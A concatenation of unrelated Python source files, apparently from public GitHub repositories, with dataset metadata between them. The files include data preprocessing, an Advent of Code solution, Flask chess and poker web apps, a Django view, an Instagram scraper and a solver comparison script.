data['salary_national'] = data['ЗП'].apply(lambda x: x.split(' ')[0]).astype('int64')
# Reading the currency base
Exchange_Rates = pd.read_csv('data/ExchangeRates.zip')
# change date format to datetime
Exchange_Rates['date'] = pd.to_datetime(Exchange_Rates['date'], dayfirst=True).dt.date
# merging of database 'date' and columns of 'Exchange_Rates':'currency', 'date', 'close', 'proportion'
data_merged = data.merge(
Exchange_Rates[['currency', 'date', 'close', 'proportion']],
left_on=['date','currency'],
right_on=['date','currency'],
how='left'
)
# Filling ruble to ruble rate as 1.
data_merged['close'] = data_merged['close'].fillna(1)
data_merged['proportion'] = data_merged['proportion'].fillna(1)
# Calculation of salary in rubles
data_merged['salary(rub)'] = data_merged['salary_national'] * data_merged['close'] / data_merged['proportion']
# Delete original features 'ЗП_сумма', 'ЗП', 'currency', 'Обновление резюме', 'close', 'proportion'
data_merged.drop(['salary_national', 'ЗП', 'currency', 'Обновление резюме', 'close', 'proportion'], axis=1, inplace=True)
data_merged['Relocation_and_business_trip_status'] = data_merged[['Relocation','Business_trip']].apply(lambda x: get_aggregated_status(*x), axis=1)
#--------------Data cleaning--------
data = data_merged
print(f'Inintal number of entries: {data.shape[0]}')
dupl_columns = list(data.columns)
mask_duplicated = data.duplicated(subset=dupl_columns)
print(f'Number of repeating lines: {data[mask_duplicated].shape[0]}')
# Delete repeating lines
data_deduplicated = data_merged.drop_duplicates(subset=dupl_columns)
print(f'Number of rows without duplicates: {data_deduplicated.shape[0]}')
# Estimation of missing values
cols_null_sum = data_deduplicated.isnull().sum()
cols_with_null = cols_null_sum[cols_null_sum > 0].sort_values(ascending=False)
# Remove rows in features 'Последнее/нынешнее место работы' and 'Последняя/нынешняя должность'.
data_deduplicated = data_deduplicated.dropna(subset=['Последнее/нынешнее место работы','Последняя/нынешняя должность'], how='any', axis=0)
# The dictionnary to fill missing values
values = {
'User_experience(months)': data_deduplicated['User_experience(months)'].median()
}
#Fill the missing values
data_deduplicated = data_deduplicated.fillna(values)
# Filtering salaries lower than 1000 and higher than 1 million rubles
mask_salary_filter = (data_deduplicated['salary(rub)'] > 1e6) | (data_deduplicated['salary(rub)'] < 1e3)
# Outliers
print(f"Number of outliers: {data_deduplicated[mask_salary_filter].shape[0]}")
# Filter entries using "mask_salary_filter"
data_deduplicated.drop(data_deduplicated[mask_salary_filter].index, axis=0, inplace=True)
# Filtering entries where user experience exceed user age
mask_experience_equal_to_age = (data_deduplicated['User_experience(months)'] / 12 > data_deduplicated['Age']) & (data_deduplicated['Age'] / 12 < data_deduplicated['User_experience(months)'])
# Outliers that stands outside of the boundary
print(f"Outliers: {data_deduplicated[mask_experience_equal_to_age].shape[0]}")
# Filtering outliers by "mask_experience_equal_to_age"
data_deduplicated.drop(data_deduplicated[mask_experience_equal_to_age].index, axis=0, inplace=True)
#remove candidates whose age exceed the range [-3*sigma; +4*sigma]
log_data = data_deduplicated['Age'] #normal scale
left = 3
right = 4
lower_bound = log_data.mean() - left * log_data.std()
upper_bound = log_data.mean() + right * log_data.std()
outliers, cleaned = outliers_z_score_mod(data_deduplicated, 'Age', left=3, right=4, log_scale=False)
# Delete outliers
data_deduplicated.drop(outliers.index, axis='index', inplace=True)
# Data encoding----------------------------------
# Let us split users by possession of auto feature: set '1' who does have an auto and '0' for those who does not
data_deduplicated['auto'] = data_deduplicated['Авто'].apply(lambda x: 1 if x.find('Имеется собственный автомобиль')>=0 else 0)
# let us drop original feature
data_deduplicated.drop(['Авто'], axis=1, inplace=True)
# Let us identify most frequent user positions and delete minor deviations in titles
data_deduplicated['position'] = data_deduplicated['Последняя/нынешняя должность'].apply(get_profession)
#delete original feature
data_deduplicated.drop(['Последняя/нынешняя должность', 'Последнее/нынешнее место работы','Ищет работу на должность:','date'], axis=1, inplace=True)
#delete original features without preprocessing
#data_deduplicated.drop(['Последнее/нынешнее место работы','Ищет работу на должность:','date'], axis=1, inplace=True)
# Encoding-----
data_encoded = pd.get_dummies(data_deduplicated, columns=['Education', 'Gender', 'City', 'Relocation_and_business_trip_status','position',
'Business_trip', 'full_time', 'part_time', 'project', 'volunteering', 'internship', 'full_time', 'flexible', 'remote', 'daily_shifts', 'long_shifts', 'Relocation',
])
# Initiate the RobustScaler()
r_scaler = preprocessing.RobustScaler()
# copy original dataset
df_r = r_scaler.fit_transform(data_encoded[['Age', 'User_experience(months)']]) #'salary(rub)'
#Transform the features for visualization
df_r = pd.DataFrame(df_r, columns=['Age_n', 'User_experience(months)_n']) #'salary(rub)'
# Add transformed features to the Dataframe
data_encoded = data_encoded.join(df_r, how='left') #on='mukey'
# Delere original features without normalization
data_encoded.drop(['Age', 'User_experience(months)'], axis=1, inplace=True)
# Delete rows with missed data
data_encoded = data_encoded.dropna(how='any', axis=0)
# copy dataframe
data_prepared = data_encoded.copy()
#--------Models---------
# Create two matrixes: features and target
X, y = data_prepared.drop('salary(rub)', axis=1, ), data_prepared['salary(rub)']
# Split the data in a ratio 80/20
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=config.random_seed)
# check the shape
print(f'X_Train: {X_train.shape} y_train: {y_train.shape}')
print(f' X_Test: {X_test.shape}, y_test: {y_test.shape}')
# # Get a logarythm of train data
# y_train_log = np.log(y_train)
# # Creation of an isntance of the linear model class wtith the L2-regularization with the best alpha-coefficient
# ridge_lr = linear_model.Ridge(alpha=config.alpha)
# # Train the model to predict log target values
# ridge_lr.fit(X_train_scaled_poly, y_train_log)
# #Make a prediction for train and test samples and get expanential data
# y_train_pred = np.exp(ridge_lr.predict(X_train_scaled_poly))
# y_test_pred = np.exp(ridge_lr.predict(X_test_scaled_poly))
# # Calculate metrics
# print_metrics(y_train, y_train_pred, y_test, y_test_pred) | Alex1iv/Deposit-subscription | utils/functions.py | functions.py | py | 20,460 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "utils.reader_config.config_reader",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "pandas.NA",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "numpy.NaN",
"line_number": 58,
"usage_type": "attribute"
},
{
"api_name": "numpy... |
31008817167 | import itertools
from collections import deque
def surrounding(input, x, y):
vals = [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1), (x - 1, y + 1), (x + 1, y + 1), (x - 1, y - 1),
(x + 1, y - 1)]
return [(x_i, y_i) for (x_i, y_i) in vals if 0 <= x_i < len(input) and 0 <= y_i < len(input[x])]
def surrounding2(input, x, y):
vals = itertools.product(range(x - 1, x + 2), range(y - 1, y + 2))
in_bounds = lambda x_i, y_i: 0 <= x_i < len(input) and 0 <= y_i < len(input[x]) and (x_i, y_i) != (x, y)
return [(x_i, y_i) for (x_i, y_i) in vals if in_bounds(x_i, y_i)]
def read_input_file(input_file):
with open(input_file) as f:
content = f.read().splitlines()
output_values = []
for line in content:
# output_values.append(line)
output_values.append(list(map(int, list(line))))
return output_values
def update_energy(input_data):
flashed = set()
flash_que = deque()
total_flashes = 0
# increase energy level of all octopus with 1
for x_i, row in enumerate(input_data):
for y_i, elem in enumerate(row):
input_data[x_i][y_i] += 1
if input_data[x_i][y_i] >= 10:
flash_que.append([x_i, y_i])
while flash_que:
(x_i, y_i) = flash_que.pop()
input_data[x_i][y_i] += 1
if (x_i, y_i) in flashed:
continue
else:
if input_data[x_i][y_i] >= 10:
flashed.add((x_i, y_i))
total_flashes += 1
flash_que.extend(
[(x_j, y_j) for (x_j, y_j) in surrounding(input_data, x_i, y_i) if (x_j, y_j) not in flashed])
for x_i, row in enumerate(input_data):
for y_i, elem in enumerate(row):
if input_data[x_i][y_i] > 9:
input_data[x_i][y_i] = 0
return input_data, total_flashes
if __name__ == '__main__':
# This is day11 part1 and part2
filename = "input/input11.txt"
data = read_input_file(filename)
number_of_octopus = len(data) * len(data[0])
total_amount_of_flashes = 0
for step in range(1, 5000):
output, number_of_flashes_per_step = update_energy(data)
print(f'After step {step}, number of flashes in this step: {number_of_flashes_per_step}')
total_amount_of_flashes += number_of_flashes_per_step
for el in output:
print(el)
if number_of_flashes_per_step == number_of_octopus:
print(f'synchronized at step {step}')
break
print(f'total amount of flashes: {total_amount_of_flashes}')
| CvanderStoep/adventofcode2021 | day11.py | day11.py | py | 2,587 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "itertools.product",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "collections.deque",
"line_number": 31,
"usage_type": "call"
}
] |
70644132584 | import flask_session
import flask_mail
from flask import Flask, render_template, redirect, request, jsonify, escape
from apscheduler.schedulers.background import BackgroundScheduler
from . import helpers, database, handle_errors, user, games
from . import handle_move, chat
app = Flask(__name__)
# Change depending on your mail configuration.
app.config['MAIL_SERVER'] = 'smtp.gmail.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USERNAME'] = 'chesscorpy@gmail.com'
app.config['MAIL_PASSWORD'] = '***'
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
app.config['SESSION_TYPE'] = 'filesystem'
mail = flask_mail.Mail(app)
flask_session.Session(app)
def handle_timeouts_wrap():
"""Allow for the call of mail in check_games under app context."""
with app.app_context():
games.handle_timeouts(mail)
# Set up the job that checks for timed out games.
game_check_job = BackgroundScheduler()
game_check_job.add_job(handle_timeouts_wrap, 'interval', seconds=30)
game_check_job.start()
@app.route('/')
def index():
"""Displays the homepage if user is not logged in,
otherwise display user page.
"""
if user.logged_in():
return render_template(
'/index_loggedin.html',
user_data=user.get_data_by_id(user.get_logged_in_id()))
else:
return render_template('index.html')
@app.route('/register', methods=['GET', 'POST'])
def register():
"""Allows a new user to register."""
if user.logged_in():
return redirect('/')
if request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
email = request.form.get('email')
notifications = 0 if not request.form.get('notifications') else 1
rating = user.set_rating(request.form.get('rating', type=int))
errors = handle_errors.for_register(username, password, email, rating)
if errors:
return errors
user.create(username, password, email, rating, notifications)
user.auto_login(username)
return redirect('/')
else:
return render_template('register.html')
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Allows a user to login."""
if user.logged_in():
return redirect('/')
if request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
errors = handle_errors.for_login_input(username, password)
if errors:
return errors
user_ = user.get_data_by_name(username, ['id', 'username', 'password'])
errors = handle_errors.for_login_sql(user_, password)
if errors:
return errors
user.create_session(user_['id'])
return redirect('/')
else:
return render_template('login.html')
@app.route('/logout')
@helpers.login_required
def logout():
"""Logs a user out."""
user.delete_session()
return redirect('/')
@app.route('/profile')
@helpers.login_required
def profile():
"""Displays the profile of a user."""
user_id = request.args.get('id', type=int)
user_data = user.get_data_by_id(user_id)
if not user_data:
return helpers.error('That user does not exist.', 400)
return render_template('profile.html', user_data=user_data)
@app.route('/opengames')
@helpers.login_required
def opengames():
"""Displays a list of public or private game requests
and allows users to sort and accept these requests.
"""
if request.args.get('direct'):
games_ = games.get_direct_requests()
else:
games_ = games.get_public_requests()
return render_template('opengames.html', games=games_)
@app.route('/newgame', methods=['GET', 'POST'])
@helpers.login_required
def newgame():
"""Allows users to create a game request."""
if request.method == 'POST':
username = request.form.get('username').lower()
color = request.form.get('color')
turnlimit = request.form.get('turnlimit', type=int)
minrating = request.form.get('minrating', type=int)
maxrating = request.form.get('maxrating', type=int)
is_public = 0 if not request.form.get('public') else 1
errors = handle_errors.for_newgame_input(username, color, turnlimit,
minrating, maxrating)
if errors:
return errors
games.create_request(user.get_logged_in_id(),
games.get_opponent_id(username), turnlimit,
minrating, maxrating, color, is_public)
return redirect('/opengames')
else:
if request.args.get('username'):
username = request.args.get('username')
else:
username = 'Public'
return render_template('newgame.html', username=username)
@app.route('/start')
@helpers.login_required
def start():
"""Creates a game from a game request."""
request_id = request.args.get('id', type=int)
if not request_id:
return redirect('/')
game_request = games.get_request_data_if_authed(request_id,
user.get_logged_in_id())
if not game_request:
return redirect('/')
white_id, black_id = helpers.determine_player_colors(
game_request['color'], game_request['user_id'],
user.get_logged_in_id())
game_id = games.create_game(white_id, black_id,
game_request['turn_day_limit'],
game_request['public'])
games.delete_request(request_id)
return redirect(f'/game?id={game_id}')
@app.route('/game')
@helpers.login_required
def game():
"""Generates a game board based on the status of the game and
allows user to make moves.
"""
game_id = request.args.get('id', type=int)
game_data = games.get_game_data_if_authed(game_id, user.get_logged_in_id())
if not game_data:
return redirect('/')
game_data = database.row_to_dict(game_data)
game_data['player_white_name'] = user.get_data_by_id(
game_data['player_white_id'], ['username'])['username']
game_data['player_black_name'] = user.get_data_by_id(
game_data['player_black_id'], ['username'])['username']
if game_data['player_white_id'] == user.get_logged_in_id():
game_data['my_color'] = 'white'
elif game_data['player_black_id'] == user.get_logged_in_id():
game_data['my_color'] = 'black'
else:
game_data['my_color'] = 'none'
return render_template('game.html', game_data=game_data)
@app.route('/activegames')
@helpers.login_required
def activegames():
"""Displays the active games of a user."""
my_move = request.args.get('my_move')
if request.args.get('id'):
user_id = request.args.get('id', type=int)
else:
user_id = user.get_logged_in_id()
if my_move and user_id == user.get_logged_in_id():
games_ = games.get_active_games_to_move(user_id)
else:
games_ = games.get_active_games(user_id)
username = user.get_data_by_id(user_id, ['username'])['username']
if user_id == user.get_logged_in_id():
my_games = True
else:
my_games = False
return render_template('activegames.html',
games=games.format_active_games(games_),
username=username, my_games=my_games)
@app.route('/history')
@helpers.login_required
def history():
"""Displays the game history of a user."""
user_id = request.args.get('id', type=int)
user_ = user.get_data_by_id(user_id, ['username'])
if not user_:
return helpers.error('That user does not exist.', 400)
username = user_['username']
games_ = games.get_game_history_if_authed(user_id, user.get_logged_in_id())
return render_template('history.html',
games=games.format_game_history(games_),
username=username)
@app.route('/settings', methods=['GET', 'POST'])
@helpers.login_required
def settings():
"""Allows user to change settings."""
if request.method == 'POST':
notify = 0 if not request.form.get('notifications') else 1
user.update_settings(user.get_logged_in_id(), notify)
return redirect('/')
else:
notify = int(user.get_data_by_id(user.get_logged_in_id(),
['notifications'])['notifications'])
return render_template('settings.html', notify=notify)
@app.route('/move', methods=['GET', 'POST'])
@helpers.login_required
def move_request():
"""Processes a move request for a game by a user."""
if request.method == 'POST':
game_id = request.form.get('id', type=int)
move = request.form.get('move')
game_data = games.get_game_data_if_to_move(game_id,
user.get_logged_in_id())
# Don't let user move in an already completed game
# or game they are not a player of.
if not game_data or not move or (
game_data['status'] != games.Status.NO_MOVE
and game_data['status'] != games.Status.IN_PROGRESS
):
return jsonify(successful=False)
# Need app context for process_move to send mail.
with app.app_context():
move_success = handle_move.process_move(
move, database.row_to_dict(game_data), mail)
return jsonify(successful=move_success)
else:
return redirect('/')
@app.route('/chat', methods=['GET', 'POST'])
@helpers.login_required
def handle_chat():
"""Sends or retrieves chat messages."""
if request.method == 'GET':
return jsonify(chat.get_chats(request.args.get('id', type=int)))
else:
game_id = request.form.get('game_id', type=int)
user_id = request.form.get('user_id', type=int)
msg = escape(request.form.get('msg'))
if (not game_id or not user_id or not msg
or len(msg) > chat.CHAT_MSG_MAX_LEN
or user_id != user.get_logged_in_id()
or not games.get_game_data_if_authed(game_id, user_id, False)):
return jsonify(successful=False)
chat.new_chat(game_id, user_id, msg)
return jsonify(successful=True)
| kurtjd/chesscorpy | chesscorpy/app.py | app.py | py | 10,426 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "flask_mail.Mail",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "flask_session.Session",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "apscheduler.schedul... |
23991293206 | from flask import Flask, render_template, request, Response, redirect, url_for, flash
import mysql.connector
import os
import requests
from sklearn import svm
train_data = []
train_labels = []
with open('poker-hand-training-true.data', 'r') as train_file:
for line in train_file:
current_line = line.rstrip('\n')
data = current_line.split(',')
hand_data = []
for i in range(10):
hand_data.append(int(data[i]))
train_labels.append(int(data[10]))
train_data.append(hand_data)
classifier = svm.SVC()
classifier.fit(train_data, train_labels)
app = Flask(__name__)
host = os.environ.get('MYSQL_HOST')
database = os.environ.get('MYSQL_DATABASE')
password = os.environ.get('MYSQL_PASSWORD')
user = os.environ.get('MYSQL_USER')
cnx = mysql.connector.connect(host=host, database=database, user=user, password=password)
cursor = cnx.cursor()
@app.route('/index')
def index():
query = 'SELECT * FROM players;'
cursor.execute(query)
return render_template('index.html', cursor=cursor)
@app.route('/add')
def add():
return render_template('add.html')
@app.route('/post', methods=['POST'])
def post():
name = request.form['name']
country = request.form['country']
query = 'INSERT INTO players (name, country) VALUES (%s, %s);'
data = (name, country)
cursor.execute(query, data)
return redirect('/index')
@app.route('/delete', methods=['POST'])
def delete():
name = request.form['name']
query = 'DELETE FROM players WHERE name=%s;'
cursor.execute(query, (name,))
return redirect('/index')
@app.route('/details')
def details():
name = request.args.get('name')
query = 'SELECT * FROM players WHERE name=%s;'
cursor.execute(query, (name,))
data = cursor.fetchone()
if data:
player_country = data[1]
country_json = requests.get('https://restcountries.eu/rest/v2/name/' + player_country + '?fullText=true')
if country_json.status_code == 404:
continent = 'unknown continent'
code = 'US'
capital = 'unknown capital'
population = 'unknown population'
flag = ''
return render_template('details.html',
name=name,
country=player_country,
continent=continent,
capital=capital,
population=population,
flag=flag)
country = country_json.json()
continent = country[0]['region']
code = country[0]['alpha2Code']
capital = country[0]['capital']
population = country[0]['population']
flag = 'https://www.countryflags.io/' + code + '/shiny/64.png'
if capital == '':
capital = 'unknown capital'
latitude_longitude = country[0]['latlng']
latitude_longitude.append('unknown')
latitude_longitude.append('unknown')
latitude = latitude_longitude[0]
longitude = latitude_longitude[1]
sunlight_json = requests.get('https://api.sunrise-sunset.org/json?lat=' + str(latitude) + '&lng=' + str(longitude))
sunlight_data = sunlight_json.json()
sunrise = 'unknown'
sunset = 'unknown'
if sunlight_data['status'] == 'OK':
sunrise = sunlight_data['results']['sunrise']
sunset = sunlight_data['results']['sunset']
return render_template('details.html',
name=name,
country=player_country,
continent=continent,
capital=capital,
population=population,
flag=flag,
sunrise=sunrise,
sunset=sunset)
else:
return redirect('/error')
@app.route('/play')
def play():
query = 'SELECT COUNT(name) from players;'
cursor.execute(query)
count = cursor.fetchone()
number_of_players = count[0]
return render_template('play.html', number_of_players=number_of_players)
@app.route('/game')
def game():
deck_data = requests.get('https://deckofcardsapi.com/api/deck/new/shuffle')
deck = deck_data.json()
deck_id = deck['deck_id']
query = 'SELECT COUNT(name) from players;'
cursor.execute(query)
count = cursor.fetchone()
number_of_players = count[0]
hands = []
card_images = []
for i in range(number_of_players):
hand_data = requests.get('https://deckofcardsapi.com/api/deck/' + deck_id + '/draw/?count=5')
hand_json = hand_data.json()
hand = []
hand_images = []
for j in range(5):
hand.append(hand_json['cards'][j]['suit'])
hand.append(hand_json['cards'][j]['value'])
hand_images.append(hand_json['cards'][j]['image'])
hands.append(hand)
card_images.append(hand_images)
translated_hands = []
for hand in hands:
translated_hand = []
for card in hand:
if card == 'ACE':
translated_hand.append(1)
elif card == '2':
translated_hand.append(2)
elif card == '3':
translated_hand.append(3)
elif card == '4':
translated_hand.append(4)
elif card == '5':
translated_hand.append(5)
elif card == '6':
translated_hand.append(6)
elif card == '7':
translated_hand.append(7)
elif card == '8':
translated_hand.append(8)
elif card == '9':
translated_hand.append(9)
elif card == '10':
translated_hand.append(10)
elif card == 'JACK':
translated_hand.append(11)
elif card == 'QUEEN':
translated_hand.append(12)
elif card == 'KING':
translated_hand.append(13)
elif card == 'HEARTS':
translated_hand.append(1)
elif card == 'SPADES':
translated_hand.append(2)
elif card == 'DIAMONDS':
translated_hand.append(3)
elif card == 'CLUBS':
translated_hand.append(4)
translated_hands.append(translated_hand)
winners = []
best_hand = 0
predictions = classifier.predict(translated_hands)
for i in range(len(predictions)):
if predictions[i] > best_hand:
best_hand = predictions[i]
winners.clear()
winners.append(i)
elif predictions[i] == best_hand:
winners.append(i)
return render_template('game.html', hands=hands, winners=winners, card_images=card_images, number_of_players=number_of_players)
@app.route('/error')
def error():
return render_template('error.html')
if __name__ == '__main__':
app.run(debug=True)
query = 'DELETE FROM players;'
cursor.execute(query)
cnx.commit()
cursor.close()
cnx.close() | dmseaman37/python-project | venv/main.py | main.py | py | 7,170 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sklearn.svm.SVC",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "sklearn.svm",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "flask.Flask",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.environ.get",
"line_nu... |
16574373936 | from typing import List
class NumArray:
def __init__(self, nums: List[int]):
self.prefSum = []
su = 0
for num in nums:
su += num
self.prefSum.append(su)
def sumRange(self, left: int, right: int) -> int:
if left > 0:
ls = self.prefSum[left - 1]
else:
ls = 0
return self.prefSum[right] - ls
# Your NumArray object will be instantiated and called as such:
# obj = NumArray(nums)
# param_1 = obj.sumRange(left,right) | BLANK00ANONYMOUS/PythonProjects | Leetcode Daily Challenges/18_feb_2023.py | 18_feb_2023.py | py | 522 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 6,
"usage_type": "name"
}
] |
24094667127 | from django.db import connection
from rest_framework import viewsets, status
from rest_framework.response import Response
from apps.motivos.api.serializers import MotivosListSerializer
class MotivosListViewSet(viewsets.GenericViewSet):
serializer_class = MotivosListSerializer
def list(self, request):
data = []
with connection.cursor() as cursor:
params = self.request.query_params.dict()
if params:
if params['idServicio'] and params['idCliente']:
idServicio = params['idServicio']
idCliente = params['idCliente']
if idServicio == '' or idCliente == '':
return Response({
'error': 'hay algun campo requerido que se encuentra vacio'
}, status=status.HTTP_400_BAD_REQUEST)
else:
cursor.execute(" [dbo].[AppCA_ListarMotivos] {0},'{1}' ".format(idServicio, idCliente))
areas_data = cursor.fetchall()
if areas_data:
for area in areas_data:
dataTemp = {
'codigo': area[0],
'area': area[1],
}
data.append(dataTemp)
area_serializer = self.get_serializer(data=data, many=True)
if area_serializer.is_valid():
return Response(area_serializer.data, status=status.HTTP_200_OK)
else:
return Response(area_serializer.errors, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({'message': 'no hay data en la consulta'}, status=status.HTTP_302_FOUND)
else:
return Response({
'error': 'Se necesitan los dos parametros solicitados'
}, status=status.HTTP_400_BAD_REQUEST)
else:
return Response({
'error': 'Por favor enviar los parametros requeridos'
}, status=status.HTTP_400_BAD_REQUEST) | jean-hub23/api_people | apps/motivos/api/views.py | views.py | py | 2,337 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "rest_framework.viewsets.GenericViewSet",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.viewsets",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "apps.motivos.api.serializers.MotivosListSerializer",
"line_number": 8,
... |
70562622184 | import sys
from collections import Counter
input = sys.stdin.readline
N = int(input())
ary = list(map(int, input().rstrip().split()))
M = int(input())
condition = list(map(int, input().rstrip().split()))
counter_dict = Counter(ary)
for num in condition:
print(counter_dict[num], end=' ') | zsmalla/algorithm-jistudy-season1 | src/chapter1/3_탐색과정렬(2)/임지수/10816_python_임지수.py | 10816_python_임지수.py | py | 295 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.stdin",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "collections.Counter",
"line_number": 11,
"usage_type": "call"
}
] |
8556430888 | from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.webdriver import WebDriver
from selenium.webdriver.remote.webelement import WebElement
from selenium.webdriver.common.by import By
import time
import chromedriver_autoinstaller
# 크롬 자동 다운로드, 옵션 설정, 창 생성
def create_chrome():
chromedriver_autoinstaller.install("./")
chrome_options = Options()
chrome_options.add_argument("--incognito")
chrome_options.add_argument("start-maximized")
chrome_options.add_argument("--no-sandbox")
return WebDriver(options=chrome_options)
def openInstagram(url: str):
# 크롬 창 생성
driver = create_chrome()
driver.implicitly_wait(10)
# 인스타 URL로 이동
driver.get(url)
# 인스타 TEXT 추출
text = driver.find_elements(By.XPATH, "//*[@class='_a9zr']")[0].text
# 태그 추출
tags = [i for i in text.split() if i.startswith("#")]
# 태그 위치 추출
indexList = []
for tag in tags:
indexList.append(text.index(tag))
# 유니코드 범위 (이 범위를 벗어나면 이모티콘같은 특수 문자)
SUPPORTED_RANGE_START = 0x0000
SUPPORTED_RANGE_END = 0xFFFF
# 특수 문자 제거할 패턴 설정
special_chars = r"[!@#$%^&*()]"
text = re.sub(special_chars, "", text)
# 태그 위치를 기반으로 추출한 텍스트에서 태그를 제거해 rst에 저장
i = 0
rst = ""
while i < len(text):
try:
s = text[i]
# 태그 위치를 기반으로 추출한 텍스트에서 태그 제거
for index in indexList:
if i == index:
tag = tags[indexList.index(index)]
i += len(tag)
if s != "#":
# 유니코드 범위를 기반으로 이모티콘 제거
code_point = ord(s)
if SUPPORTED_RANGE_START <= code_point <= SUPPORTED_RANGE_END:
rst += s
else:
pass
i += 1
except:
i += 1
pass
print(rst)
# url format -> https://www.instagram.com/p/~
openInstagram("https://www.instagram.com/p/Ct8JehTPpNe/")
| Yuminyumin/MBTIGRAM | cr.py | cr.py | py | 2,254 | python | ko | code | 0 | github-code | 36 | [
{
"api_name": "chromedriver_autoinstaller.install",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.chrome.options.Options",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.chrome.webdriver.WebDriver",
"line_number": 1... |
28877476369 | #!/usr/bin python3
import numpy as np
import pathlib
import pickle
import os
from DGSQP.tracks.track_lib import get_track
import matplotlib.pyplot as plt
import matplotlib
matplotlib.use('TkAgg')
plt.rcParams['text.usetex'] = True
data_dir = 'dgsqp_algames_mc_comp_09-10-2022_19-41-37'
data_path = pathlib.Path(pathlib.Path.home(), f'results/{data_dir}')
sqp_conv_feas, sqp_max_feas, sqp_fail_feas = [], [], []
alg_conv_feas, alg_max_feas, alg_fail_feas = [], [], []
n_sqp_conv_feas = 0
n_sqp_fail_feas = 0
n_alg_conv_feas = 0
n_alg_fail_feas = 0
k = 0
a = 0
sqp_n_conv, sqp_n_div, sqp_n_max = 0, 0, 0
sqp_iters, sqp_time = [], []
alg_n_conv, alg_n_div, alg_n_max = 0, 0, 0
alg_iters, alg_time = [], []
x0, y0 = [], []
sqp_status, alg_status = [], []
for f in os.listdir(data_path):
if f.endswith('.pkl'):
with open(data_path.joinpath(f), 'rb') as f:
data = pickle.load(f)
joint_init = data['dgsqp']['init']
x0.append(np.mean([s.x.x for s in joint_init]))
y0.append(np.mean([s.x.y for s in joint_init]))
sqp_res, alg_res = data['dgsqp'], data['algames']
sqp_conv = sqp_res['solve_info']['status']
sqp_msg = sqp_res['solve_info']['msg']
sqp_vio = sqp_res['solve_info']['cond']['p_feas']
if sqp_conv:
sqp_n_conv += 1
sqp_iters.append(sqp_res['solve_info']['num_iters'])
sqp_time.append(sqp_res['solve_info']['time'])
if sqp_vio > 0:
sqp_conv_feas.append(sqp_vio)
else:
n_sqp_conv_feas += 1
if sqp_msg == 'max_it':
sqp_n_max += 1
if sqp_vio > 0:
sqp_max_feas.append(sqp_vio)
else:
n_sqp_fail_feas += 1
elif sqp_msg == 'diverged' or sqp_msg == 'qp_fail':
sqp_n_div += 1
if sqp_vio > 0:
sqp_fail_feas.append(sqp_vio)
else:
n_sqp_fail_feas += 1
sqp_status.append(sqp_conv)
alg_conv = alg_res['solve_info']['status']
alg_msg = alg_res['solve_info']['msg']
alg_vio = np.abs(alg_res['solve_info']['cond']['p_feas'])
if alg_conv:
alg_n_conv += 1
alg_iters.append(alg_res['solve_info']['num_iters'])
alg_time.append(alg_res['solve_info']['time'])
if alg_vio > 0:
alg_conv_feas.append(alg_vio)
else:
n_alg_conv_feas += 1
if alg_msg == 'max_iters' or alg_msg == 'max_it':
alg_n_max += 1
if alg_vio > 0:
alg_max_feas.append(alg_vio)
else:
n_alg_fail_feas += 1
elif alg_msg == 'diverged':
alg_n_div += 1
if alg_vio > 0:
alg_fail_feas.append(alg_vio)
else:
n_alg_fail_feas += 1
alg_status.append(alg_conv)
a += (np.mean(sqp_iters)-np.mean(alg_iters))/np.mean(alg_iters)
k += 1
# print(n_sqp_conv_feas, n_sqp_fail_feas)
# print(n_alg_conv_feas, n_alg_fail_feas)
# print(a/k)
x0 = np.array(x0)
y0 = np.array(y0)
w = 7
print('========================================')
print(' | SQP | ALG ')
print('Converged |%s|%s' % (f'{sqp_n_conv:3d}'.rjust(w), f'{alg_n_conv:3d}'.rjust(w)))
print('Failed |%s|%s' % (f'{sqp_n_div:3d}'.rjust(w), f'{alg_n_div:3d}'.rjust(w)))
print('Max |%s|%s' % (f'{sqp_n_max:3d}'.rjust(w), f'{alg_n_max:3d}'.rjust(w)))
print('Avg iters |%s|%s' % (f'{np.mean(sqp_iters):4.2f}'.rjust(w), f'{np.mean(alg_iters):4.2f}'.rjust(w)))
print('Std iters |%s|%s' % (f'{np.std(sqp_iters):4.2f}'.rjust(w), f'{np.std(alg_iters):4.2f}'.rjust(w)))
print('Avg time |%s|%s' % (f'{np.mean(sqp_time):4.2f}'.rjust(w), f'{np.mean(alg_time):4.2f}'.rjust(w)))
print('Std time |%s|%s' % (f'{np.std(sqp_time):4.2f}'.rjust(w), f'{np.std(alg_time):4.2f}'.rjust(w)))
track_obj = get_track('L_track_barc')
fig = plt.figure(figsize=(20,10))
ax_sqp = fig.add_subplot(1,2,1)
track_obj.plot_map(ax_sqp)
sqp_succ = np.where(sqp_status)[0].astype(int)
sqp_fail = np.setdiff1d(np.arange(len(sqp_status)), sqp_succ).astype(int)
ax_sqp.scatter(x0[sqp_succ], y0[sqp_succ], facecolors='none', edgecolors='g', marker='o', s=40)
